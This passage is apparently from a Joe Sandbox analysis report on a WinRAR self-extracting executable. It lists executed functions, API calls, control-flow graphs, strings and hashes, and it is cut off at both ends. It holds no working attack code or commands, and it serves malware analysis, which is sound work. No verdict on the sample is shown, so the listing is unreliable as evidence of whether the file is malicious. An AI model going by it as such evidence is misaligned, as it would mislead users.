24705->24706 24706->24705 24795 4e7090 114 API calls 24796 4ecc90 70 API calls 24843 4ea990 97 API calls 24844 4e9b90 GdipCloneImage GdipAlloc 24709 4ed891 19 API calls ___delayLoadHelper2@8 24845 4f9b90 21 API calls 2 library calls 24798 4ee4a2 38 API calls 2 library calls 24800 4d96a0 79 API calls 24848 4fe9a0 51 API calls 24803 4f76bd 52 API calls 2 library calls 24850 4f79b7 55 API calls _free 24805 4d16b0 84 API calls 24731 4f90b0 24739 4fa56f 24731->24739 24734 4f90c4 24736 4f90cc 24737 4f90d9 24736->24737 24747 4f90e0 11 API calls 24736->24747 24740 4fa458 _unexpected 5 API calls 24739->24740 24741 4fa596 24740->24741 24742 4fa5ae TlsAlloc 24741->24742 24743 4fa59f 24741->24743 24742->24743 24744 4eec4a _ValidateLocalCookies 5 API calls 24743->24744 24745 4f90ba 24744->24745 24745->24734 24746 4f9029 20 API calls 2 library calls 24745->24746 24746->24736 24747->24734 24748 4fa3b0 24750 4fa3bb 24748->24750 24749 4fa6ca 11 API calls 24749->24750 24750->24749 24751 4fa3e4 24750->24751 24752 4fa3e0 24750->24752 24754 4fa410 DeleteCriticalSection 24751->24754 24754->24752 24806 4f1eb0 6 API calls 3 library calls

                Executed Functions

                Function 004ED5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197filesleeptimeCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 004E00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 004E00E4
                  • Part of subcall function 004E00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004E00F6
                  • Part of subcall function 004E00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004E0127
                  • Part of subcall function 004E9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 004E9DAC
                  • Part of subcall function 004EA335: OleInitialize.OLE32(00000000), ref: 004EA34E
                  • Part of subcall function 004EA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004EA385
                  • Part of subcall function 004EA335: SHGetMalloc.SHELL32(00518430), ref: 004EA38F
                  • Part of subcall function 004E13B3: GetCPInfo.KERNEL32(00000000,?), ref: 004E13C4
                  • Part of subcall function 004E13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 004E13D8
                • GetCommandLineW.KERNEL32 ref: 004ED61C
                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 004ED643
                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 004ED654
                • UnmapViewOfFile.KERNEL32(00000000), ref: 004ED68E
                  • Part of subcall function 004ED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ED29D
                  • Part of subcall function 004ED287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ED2D9
                • CloseHandle.KERNEL32(00000000), ref: 004ED697
                • GetModuleFileNameW.KERNEL32(00000000,0052DC90,00000800), ref: 004ED6B2
                • SetEnvironmentVariableW.KERNEL32(sfxname,0052DC90), ref: 004ED6BE
                • GetLocalTime.KERNEL32(?), ref: 004ED6C9
                • _swprintf.LIBCMT ref: 004ED708
                • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 004ED71A
                • GetModuleHandleW.KERNEL32(00000000), ref: 004ED721
                • LoadIconW.USER32(00000000,00000064), ref: 004ED738
                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 004ED789
                • Sleep.KERNEL32(?), ref: 004ED7B7
                • DeleteObject.GDI32 ref: 004ED7F0
                • DeleteObject.GDI32(?), ref: 004ED800
                • CloseHandle.KERNEL32 ref: 004ED843
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xjR
                • API String ID: 788466649-2615718643
                • Opcode ID: 236367713b3e6958419f7e4d2b3830aea5f888ec23d3212574b7254ddbaa9c5e
                • Instruction ID: b071242571b5d52fbd1f2c5172552983c9f26277daef8a7d2296eeaee9faaa9e
                • Opcode Fuzzy Hash: 236367713b3e6958419f7e4d2b3830aea5f888ec23d3212574b7254ddbaa9c5e
                • Instruction Fuzzy Hash: 9461D771900380AFD720AF639C4AF7B3BACBF55746F00441AF94592291DBB89D48D765
                Function 004E9E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 770 4e9e1c-4e9e38 FindResourceW 771 4e9e3e-4e9e50 SizeofResource 770->771 772 4e9f2f-4e9f32 770->772 773 4e9e52-4e9e61 LoadResource 771->773 774 4e9e70-4e9e72 771->774 773->774 775 4e9e63-4e9e6e LockResource 773->775 776 4e9f2e 774->776 775->774 777 4e9e77-4e9e8c GlobalAlloc 775->777 776->772 778 4e9f28-4e9f2d 777->778 779 4e9e92-4e9e9b GlobalLock 777->779 778->776 780 4e9f21-4e9f22 GlobalFree 779->780 781 4e9ea1-4e9ebf call 4ef4b0 CreateStreamOnHGlobal 779->781 780->778 784 4e9f1a-4e9f1b GlobalUnlock 781->784 785 4e9ec1-4e9ee3 call 4e9d7b 781->785 784->780 785->784 790 4e9ee5-4e9eed 785->790 791 4e9eef-4e9f03 GdipCreateHBITMAPFromBitmap 790->791 792 4e9f08-4e9f16 790->792 791->792 793 4e9f05 791->793 792->784 793->792
                APIs
                • FindResourceW.KERNEL32(004EAE4D,PNG,?,?,?,004EAE4D,00000066), ref: 004E9E2E
                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,004EAE4D,00000066), ref: 004E9E46
                • LoadResource.KERNEL32(00000000,?,?,?,004EAE4D,00000066), ref: 004E9E59
                • LockResource.KERNEL32(00000000,?,?,?,004EAE4D,00000066), ref: 004E9E64
                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,004EAE4D,00000066), ref: 004E9E82
                • GlobalLock.KERNEL32(00000000), ref: 004E9E93
                • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 004E9EB7
                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 004E9EFC
                • GlobalUnlock.KERNEL32(00000000), ref: 004E9F1B
                • GlobalFree.KERNEL32(00000000), ref: 004E9F22
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                • String ID: PNG
                • API String ID: 3656887471-364855578
                • Opcode ID: 2a307da038adf708c79b8a0383b45c0ef4083d7d04e0faac04ecea9647ecd47a
                • Instruction ID: e75dbbf4aaa8b11aab30b2d74f99f2737d352fb08fd220e18c7868dc5673f3cc
                • Opcode Fuzzy Hash: 2a307da038adf708c79b8a0383b45c0ef4083d7d04e0faac04ecea9647ecd47a
                • Instruction Fuzzy Hash: B1319E75204342ABC7109F23DC4896FBBADFF99752B04452AF902D23A0EB75DC04DAA5
                Function 004DA5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 970 4da5f4-4da61f call 4ee360 973 4da691-4da69a FindNextFileW 970->973 974 4da621-4da632 FindFirstFileW 970->974 977 4da69c-4da6aa GetLastError 973->977 978 4da6b0-4da6b2 973->978 975 4da6b8-4da75c call 4dfe56 call 4dbcfb call 4e0e19 * 3 974->975 976 4da638-4da64f call 4db66c 974->976 981 4da761-4da774 975->981 985 4da66a-4da673 GetLastError 976->985 986 4da651-4da668 FindFirstFileW 976->986 977->978 978->975 978->981 988 4da675-4da678 985->988 989 4da684 985->989 986->975 986->985 988->989 991 4da67a-4da67d 988->991 992 4da686-4da68c 989->992 991->989 994 4da67f-4da682 991->994 992->981 994->992
                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA628
                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA65E
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA66A
                • FindNextFileW.KERNEL32(?,?,?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA692
                • GetLastError.KERNEL32(?,?,?,?,004DA4EF,000000FF,?,?), ref: 004DA69E
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FileFind$ErrorFirstLast$Next
                • String ID:
                • API String ID: 869497890-0
                • Opcode ID: ccf0a451c62311a0baa1818427108be70ef68d9b1cd074392e2e187b5ff2f5a0
                • Instruction ID: f7a6c7acce6455c55c562ae8dbd86c067720fcb215a7428b6725e2bb83ac970b
                • Opcode Fuzzy Hash: ccf0a451c62311a0baa1818427108be70ef68d9b1cd074392e2e187b5ff2f5a0
                • Instruction Fuzzy Hash: 7A415271505241EFC324EF69C894ADBF7E8BB58344F040A2BF5D9D3340D778A9688B96
                Function 004F753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,004F7513,00000000,0050BAD8,0000000C,004F766A,00000000,00000002,00000000), ref: 004F755E
                • TerminateProcess.KERNEL32(00000000,?,004F7513,00000000,0050BAD8,0000000C,004F766A,00000000,00000002,00000000), ref: 004F7565
                • ExitProcess.KERNEL32 ref: 004F7577
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 987d08e928bf29ee64b079565f779df25ba034d3bb1c0bbccc7182071c1bf4e3
                • Instruction ID: fdfb199c8cad1b72654059b47a0f96fbbc4fde3af6c707f158ff997880c0f7d0
                • Opcode Fuzzy Hash: 987d08e928bf29ee64b079565f779df25ba034d3bb1c0bbccc7182071c1bf4e3
                • Instruction Fuzzy Hash: 9CE04631000608ABCF11AF25CD4CA693F69EB10381F008019FA098A632CB3DDE42DA84
                Function 004D857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID:
                • API String ID: 3004599000-0
                • Opcode ID: 4d32c08a495283af6162b4e4434c4f62634c38852f6c038eb99fe528bb37db19
                • Instruction ID: f4cdd47b0ed54f5c411af09e63eb2a2b37d6418ff8f38af00936f5a8ce26e6ca
                • Opcode Fuzzy Hash: 4d32c08a495283af6162b4e4434c4f62634c38852f6c038eb99fe528bb37db19
                • Instruction Fuzzy Hash: DB821970904245AEDF25DB60C8A5BFFB7A9AF05304F0841BFE8499B342DB385E45CB58
                Function 004EAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 004EAEE5
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prologItemTextWindow
                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                • API String ID: 810644672-8108337
                • Opcode ID: 344362db3e4728776e9c5ca1fd6866f13115defb90410ef63a381029faea79c3
                • Instruction ID: 7a1cc681154dd3c55fef594e73f957db8c0e82328046b7e745054193706e6ba0
                • Opcode Fuzzy Hash: 344362db3e4728776e9c5ca1fd6866f13115defb90410ef63a381029faea79c3
                • Instruction Fuzzy Hash: 0D42FA70904294BEEB21AB629C49FFF7B7CEB11709F00405AF641A62D1CBB85D4CDB69
                Function 004E00CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317libraryfileloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 257 4e00cf-4e00ee call 4ee360 GetModuleHandleW 260 4e0154-4e03b2 257->260 261 4e00f0-4e0107 GetProcAddress 257->261 262 4e03b8-4e03c3 call 4f70dd 260->262 263 4e0484-4e04b3 GetModuleFileNameW call 4dbc85 call 4dfe56 260->263 264 4e0109-4e011f 261->264 265 4e0121-4e0131 GetProcAddress 261->265 262->263 274 4e03c9-4e03fa GetModuleFileNameW CreateFileW 262->274 279 4e04b5-4e04bf call 4dacf5 263->279 264->265 265->260 266 4e0133-4e0152 265->266 266->260 276 4e03fc-4e040a SetFilePointer 274->276 277 4e0478-4e047f CloseHandle 274->277 276->277 280 4e040c-4e0429 ReadFile 276->280 277->263 285 4e04cc 279->285 286 4e04c1-4e04c5 call 4e0085 279->286 280->277 281 4e042b-4e0450 280->281 283 4e046d-4e0476 call 4dfbd8 281->283 283->277 294 4e0452-4e046c call 4e0085 283->294 289 4e04ce-4e04d0 285->289 291 4e04ca 286->291 292 4e04f2-4e0518 call 4dbcfb GetFileAttributesW 289->292 293 4e04d2-4e04f0 CompareStringW 289->293 291->289 296 4e051a-4e051e 292->296 301 4e0522 292->301 293->292 293->296 294->283 296->279 300 4e0520 296->300 302 4e0526-4e0528 300->302 301->302 303 4e052a 302->303 304 4e0560-4e0562 302->304 307 4e052c-4e0552 call 4dbcfb GetFileAttributesW 303->307 305 4e066f-4e0679 304->305 306 4e0568-4e057f call 4dbccf call 4dacf5 304->306 317 4e05e7-4e061a call 4d400a AllocConsole 306->317 318 4e0581-4e05e2 call 4e0085 * 2 call 4dddd1 call 4d400a call 4dddd1 call 4e9f35 306->318 312 4e055c 307->312 313 4e0554-4e0558 307->313 312->304 313->307 315 4e055a 313->315 315->304 323 4e061c-4e0661 GetCurrentProcessId AttachConsole call 4f35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->323 324 4e0667-4e0669 ExitProcess 317->324 318->324 323->324
                APIs
                • GetModuleHandleW.KERNEL32(kernel32), ref: 004E00E4
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004E00F6
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004E0127
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004E03D4
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004E03F0
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004E0402
                • ReadFile.KERNEL32(00000000,?,00007FFE,00503BA4,00000000), ref: 004E0421
                • CloseHandle.KERNEL32(00000000), ref: 004E0479
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 004E048F
                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 004E04E7
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 004E0510
                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 004E054A
                  • Part of subcall function 004E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004E00A0
                  • Part of subcall function 004E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004DEB86,Crypt32.dll,00000000,004DEC0A,?,?,004DEBEC,?,?,?), ref: 004E00C2
                • _swprintf.LIBCMT ref: 004E05BE
                • _swprintf.LIBCMT ref: 004E060A
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • AllocConsole.KERNEL32 ref: 004E0612
                • GetCurrentProcessId.KERNEL32 ref: 004E061C
                • AttachConsole.KERNEL32(00000000), ref: 004E0623
                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004E0649
                • WriteConsoleW.KERNEL32(00000000), ref: 004E0650
                • Sleep.KERNEL32(00002710), ref: 004E065B
                • FreeConsole.KERNEL32 ref: 004E0661
                • ExitProcess.KERNEL32 ref: 004E0669
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                • String ID: <P$ ?P$(>P$(@P$0AP$4=P$8<P$<?P$@>P$@@P$D=P$DAP$DXGIDebug.dll$P<P$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;P$T?P$X>P$X@P$\AP$`=P$dwmapi.dll$kernel32$l<P$p>P$p?P$p@P$uxtheme.dll$x=P$|<P$>P$?P
                • API String ID: 1201351596-3633057107
                • Opcode ID: 5fbde05619ee167f5d36279bfe78787849d72946eca18c4904cbdfc216aa3101
                • Instruction ID: c81ecc59ed99661f9d7adf9ad139564c919038ee39f34dd2dca4efe1a4f7ead5
                • Opcode Fuzzy Hash: 5fbde05619ee167f5d36279bfe78787849d72946eca18c4904cbdfc216aa3101
                • Instruction Fuzzy Hash: 0ED18FB1008384ABD330DF51D85DB9FBEECBF84705F00491EF6999A280DBB486488F66
                Function 004EBDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 406 4ebdf5-4ebe0d call 4ee28c call 4ee360 411 4ebe13-4ebe3d call 4eaa36 406->411 412 4eca90-4eca9d 406->412 411->412 415 4ebe43-4ebe48 411->415 416 4ebe49-4ebe57 415->416 417 4ebe58-4ebe6d call 4ea6c7 416->417 420 4ebe6f 417->420 421 4ebe71-4ebe86 call 4e17ac 420->421 424 4ebe88-4ebe8c 421->424 425 4ebe93-4ebe96 421->425 424->421 426 4ebe8e 424->426 427 4eca5c-4eca87 call 4eaa36 425->427 428 4ebe9c 425->428 426->427 427->416 442 4eca8d-4eca8f 427->442 430 4ec074-4ec076 428->430 431 4ec115-4ec117 428->431 432 4ec132-4ec134 428->432 433 4ebea3-4ebea6 428->433 430->427 438 4ec07c-4ec088 430->438 431->427 436 4ec11d-4ec12d SetWindowTextW 431->436 432->427 437 4ec13a-4ec141 432->437 433->427 434 4ebeac-4ebf06 call 4e9da4 call 4db965 call 4da49d call 4da5d7 call 4d70bf 433->434 495 4ec045-4ec05a call 4da52a 434->495 436->427 437->427 443 4ec147-4ec160 437->443 439 4ec09c-4ec0a1 438->439 440 4ec08a-4ec09b call 4f7168 438->440 446 4ec0ab-4ec0b6 call 4eab9a 439->446 447 4ec0a3-4ec0a9 439->447 440->439 442->412 448 4ec168-4ec176 call 4f35b3 443->448 449 4ec162 443->449 453 4ec0bb-4ec0bd 446->453 447->453 448->427 460 4ec17c-4ec185 448->460 449->448 458 4ec0bf-4ec0c6 call 4f35b3 453->458 459 4ec0c8-4ec0e8 call 4f35b3 call 4f35de 453->459 458->459 480 4ec0ea-4ec0f1 459->480 481 4ec101-4ec103 459->481 464 4ec1ae-4ec1b1 460->464 465 4ec187-4ec18b 460->465 471 4ec296-4ec2a4 call 4dfe56 464->471 472 4ec1b7-4ec1ba 464->472 465->464 469 4ec18d-4ec195 465->469 469->427 476 4ec19b-4ec1a9 call 4dfe56 469->476 488 4ec2a6-4ec2ba call 4f17cb 471->488 478 4ec1bc-4ec1c1 472->478 479 4ec1c7-4ec1e2 472->479 476->488 478->471 478->479 496 4ec22c-4ec233 479->496 497 4ec1e4-4ec21e 479->497 485 4ec0f8-4ec100 call 4f7168 480->485 486 4ec0f3-4ec0f5 480->486 481->427 487 4ec109-4ec110 call 4f35ce 481->487 485->481 486->485 487->427 506 4ec2bc-4ec2c0 488->506 507 4ec2c7-4ec318 call 4dfe56 call 4ea8d0 GetDlgItem SetWindowTextW SendMessageW call 4f35e9 488->507 512 4ebf0b-4ebf1f SetFileAttributesW 495->512 513 4ec060-4ec06f call 4da4b3 495->513 499 4ec235-4ec24d call 4f35b3 496->499 500 4ec261-4ec284 call 4f35b3 * 2 496->500 525 4ec222-4ec224 497->525 526 4ec220 497->526 499->500 517 4ec24f-4ec25c call 4dfe2e 499->517 500->488 533 4ec286-4ec294 call 4dfe2e 500->533 506->507 511 4ec2c2-4ec2c4 506->511 540 4ec31d-4ec321 507->540 511->507 518 4ebfc5-4ebfd5 GetFileAttributesW 512->518 519 4ebf25-4ebf58 call 4db4f7 call 4db207 call 4f35b3 512->519 513->427 517->500 518->495 523 4ebfd7-4ebfe6 DeleteFileW 518->523 549 4ebf5a-4ebf69 call 4f35b3 519->549 550 4ebf6b-4ebf79 call 4db925 519->550 523->495 532 4ebfe8-4ebfeb 523->532 525->496 526->525 536 4ebfef-4ec01b call 4d400a GetFileAttributesW 532->536 533->488 547 4ebfed-4ebfee 536->547 548 4ec01d-4ec033 MoveFileW 536->548 540->427 544 4ec327-4ec33b SendMessageW 540->544 544->427 547->536 548->495 551 4ec035-4ec03f MoveFileExW 548->551 549->550 556 4ebf7f-4ebfbe call 4f35b3 call 4ef350 549->556 550->513 550->556 551->495 556->518
                APIs
                • __EH_prolog.LIBCMT ref: 004EBDFA
                  • Part of subcall function 004EAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 004EAAFE
                • SetWindowTextW.USER32(?,?), ref: 004EC127
                • _wcsrchr.LIBVCRUNTIME ref: 004EC2B1
                • GetDlgItem.USER32(?,00000066), ref: 004EC2EC
                • SetWindowTextW.USER32(00000000,?), ref: 004EC2FC
                • SendMessageW.USER32(00000000,00000143,00000000,0051A472), ref: 004EC30A
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004EC335
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                • API String ID: 3564274579-312220925
                • Opcode ID: 67afa806685e8fab39703c4f2eb087614f86c0ae5c7aaa30f1080a81a9389362
                • Instruction ID: 7c695bcf5584453f81f0cd3fd20f155de01a2e37f4e41c3d4634c603a05d304a
                • Opcode Fuzzy Hash: 67afa806685e8fab39703c4f2eb087614f86c0ae5c7aaa30f1080a81a9389362
                • Instruction Fuzzy Hash: 8EE19672D00158AADB25DBA1DC89EEF777CAF14316F0040ABF605E3191E7789E898F54
                Function 004DD341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
